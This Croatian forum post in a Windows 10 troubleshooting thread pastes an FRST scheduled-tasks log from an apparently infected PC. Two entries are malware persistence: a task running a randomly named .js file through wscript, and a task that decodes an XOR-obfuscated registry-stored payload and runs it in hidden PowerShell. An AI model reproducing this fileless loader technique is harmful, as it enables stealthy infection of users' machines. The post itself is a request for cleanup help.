Tema: Windows 10 - problemi, troubleshooting
View Single Post
Staro 05.08.2023., 22:40   #1296
fre@k
Premium
Moj komp
 
fre@k's Avatar
 
Datum registracije: Oct 2008
Lokacija: osijek
Postovi: 1,860
Citiraj:
Autor domy_os Pregled postova
Ima li kakvih promjena? Ovime možeš skroz disableati script host...

Code:
New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue
U HJT logu ne vidim nešto sumnjivo, ali stavi logove i od FRST-a...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Spremi ga na desktop, zatvori sve aplikacije, pokreni FRST kao admin i uploadaj FRST.txt i Addition.txt.

Citiraj:
==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {AA4E7D09-9A75-4EC8-A544-7AE09FE2BF2C} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3571168 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {4B2166D7-9095-4E41-8514-761031C41EFF} - System32\Tasks\Adobe-Genuine-Software-Integrity-Scheduler-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3807712 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {39C03E5D-2DA3-4F39-B932-843B937F87A9} - System32\Tasks\AMD Updater => "C:\Program Files\AMD\CIM\\Bin64\RadeonInstaller.exe" /AUTOUPDATEIN (No File)
Task: {362C6AB5-4825-4EF1-91A6-1B2EF3E23A1E} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {3C99DAB8-74FF-48FD-A420-2D819752AA23} - System32\Tasks\AMDRyzenMasterSDKTask => C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe [329216 2022-04-28] (Advanced Micro Devices, Inc.) [File not signed]
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
Task: {B6D087B8-7386-4E55-B3D0-479AE5B8B90B} - System32\Tasks\CorelUpdateHelperTask-3A0684C52AD8F776732C9B1769387381 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {D1A4030E-7946-457D-9793-190B52233518} - System32\Tasks\CorelUpdateHelperTask-CA97E265125F962DF330CDDECA55BEE5 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {9C9FF58C-A602-46F5-AAE7-A84FA91F0C86} - System32\Tasks\CorelUpdateHelperTaskCore => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {60FB7528-96B7-4FA1-B245-6B63B40A5F47} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {37CA0682-E6DF-49F6-8163-0FA4D5DC50D2} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {C3330DB9-49FB-4267-89AC-052150FEDDF0} - System32\Tasks\eID Updater => C:\Program Files\AKD\eID Middleware\Updater.exe [1180352 2022-09-09] (AKD d.o.o. -> Agencija za komercijalnu djelatnost)
Task: {05394564-3C71-4D68-9648-25FF67BB7DF3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {589D9887-524D-4F64-A8D4-284AF9A1EE9E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {AF9D7CB3-4F89-4566-BC65-5AA0F26EBBDA} - System32\Tasks\GPU Tweak III => C:\Program Files (x86)\ASUS\GPUTweakIII\GPU Tweak III.exe (No File)
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
Task: {BB849378-0BD7-4B2F-95F5-770D9CDF04AC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {D5027B44-EABC-4281-A4B1-4AE77EB51887} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {34C46FA8-19E5-4D6A-A5E0-987A63C380DD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {13FD3601-86C6-4450-A538-023F355286CA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7899D856-F71C-4C55-A4C4-56EF43747554} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {048CC466-9E92-4167-B46A-3AE942372F8A} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [5339512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {5763BDB9-76F7-4E06-A9A5-DF31824F83EB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [5659512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {DC6568DB-8280-4900-A49A-A3C5C22FB845} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [5839224 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {99A4D46B-6BA9-48BD-8FB2-327DC62F789C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [56368 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {0FAD7383-8483-46BA-B554-AAE7B51C68B4} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [261680 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {11B7C842-A90B-41BB-AD4E-5835311B3248} - System32\Tasks\update-S-1-5-21-1851460496-1243864188-3666012494-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {2CD04026-E5A8-41BD-B48E-08B3B9470A72} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Znaci sve sam izguglao ali neznam uz cega je ovo vezano

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
__________________


CPU: I5 2500k
GPU: MSI TF 660 OC
MBO: Asrock Z68 PRO3
RAM: 2x4gb G. Skill (1333mhz)
PSU: Seasonic 620W
HDD: SSD 180gb Intel 520 | WD Green 2TB
CASE: CM Elite 370
Ostalo: MX518, Logitech Ultra Flat, DELL U2412M, Hyper 212+



Ako Vam je život tužan, ne brinite! Barem Vam je plaća smiješna
fre@k je offline   Reply With Quote